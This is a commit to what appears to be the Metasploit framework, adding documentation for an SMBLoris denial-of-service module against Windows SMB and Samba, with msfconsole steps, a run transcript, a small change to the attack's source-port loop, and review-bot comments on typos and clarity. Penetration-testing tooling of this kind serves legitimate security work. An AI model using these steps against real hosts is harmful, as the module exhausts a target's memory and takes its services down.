add module documentation

add module docs for the new smbloris DoS
bug/bundler_fix
David Maloney 2017-08-04 16:10:44 -05:00
parent 15cc2a9dc0
commit 289f03241b
No known key found for this signature in database
GPG Key ID: DEDBA9DC3A913DB2
2 changed files with 48 additions and 1 deletions


@ -0,0 +1,43 @@
## Vulnerable Application
This module exploits a vulnerability in the NetBIOS Session Service Header for SMB.
Any Windows machine with SMB Exposed, or any Linux system running Samba are vulnerable.
See [the SMBLoris page](http://smbloris.com/) for details on the vulnerability.
The module opens over 64,000 connections to the target service, so please make sure
your system ULIMIT is set appropriately to handle it. A single host running this module
can theoretically consume up to 8GB of memory on the target.
## Verification Steps
Example steps in this format (is also in the PR):
1. Start msfconsole
1. Do: `use auxiliary/dos/smb/smb_lorris`
1. Do: `set RHOST [IP]`
1. Do: `run`
1. Target should allocate increasing amounts of memory.
## Scenarios
###
```
msf auxiliary(smb_loris) > use auxiliary/dos/smb/smb_loris
msf auxiliary(smb_loris) > set RHOST 192.168.172.138
RHOST => 192.168.172.138
msf auxiliary(smb_loris) >
msf auxiliary(smb_loris) > run
[*] 192.168.172.138:445 - Sending packet from Source Port: 1025
[*] 192.168.172.138:445 - Sending packet from Source Port: 1026
[*] 192.168.172.138:445 - Sending packet from Source Port: 1027
[*] 192.168.172.138:445 - Sending packet from Source Port: 1028
[*] 192.168.172.138:445 - Sending packet from Source Port: 1029
[*] 192.168.172.138:445 - Sending packet from Source Port: 1030
[*] 192.168.172.138:445 - Sending packet from Source Port: 1031
[*] 192.168.172.138:445 - Sending packet from Source Port: 1032
[*] 192.168.172.138:445 - Sending packet from Source Port: 1033
....
```
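Review bot: Verification step 2 gives the module path as `auxiliary/dos/smb/smb_lorris`, which does not match the `auxiliary/dos/smb/smb_loris` path used in the Scenarios transcript. The msf prompt in the transcript shows `smb_loris`, so the step should be corrected to that spelling. The line "Example steps in this format (is also in the PR):" reads like leftover template text and can be removed. The bare `###` heading under Scenarios needs a title, such as the target that was tested, or should be dropped.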


@ -27,6 +27,9 @@ class MetasploitModule < Msf::Auxiliary
large numbers of these sessions, the memory does not get freed, and the server
grinds to a halt. This vulnerability was originally disclosed by Sean Dillon
and Zach Harding.
DISCALIMER: This module opens a lot of simultaneous connections. Please check
your system's ULIMIT to make sure it can handle it.
},
'Author' =>
[
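Review bot: "DISCALIMER" in the added description lines is misspelled and should read "DISCLAIMER". The text tells the user to check ULIMIT without giving a figure. The module documentation in this same commit says the module opens over 64,000 connections, and repeating that number here would tell the user what limit to set.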
@ -52,7 +55,8 @@ class MetasploitModule < Msf::Auxiliary
linger = Socket::Option.linger(true, 60)
(1..65535).each do |src_port|
(1025..65535).each do |src_port|
print_status "Sending packet from Source Port: #{src_port}"
opts = {
'CPORT' => src_port,
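Review bot: The new lower bound in `(1025..65535).each do |src_port|` is an unexplained magic number. Add a short comment saying why the low source ports are skipped, so the next reader does not widen the range again. The `print_status` call inside the loop also emits one line per source port, as the documentation transcript shows, so `vprint_status` or a periodic progress message would keep the console output readable.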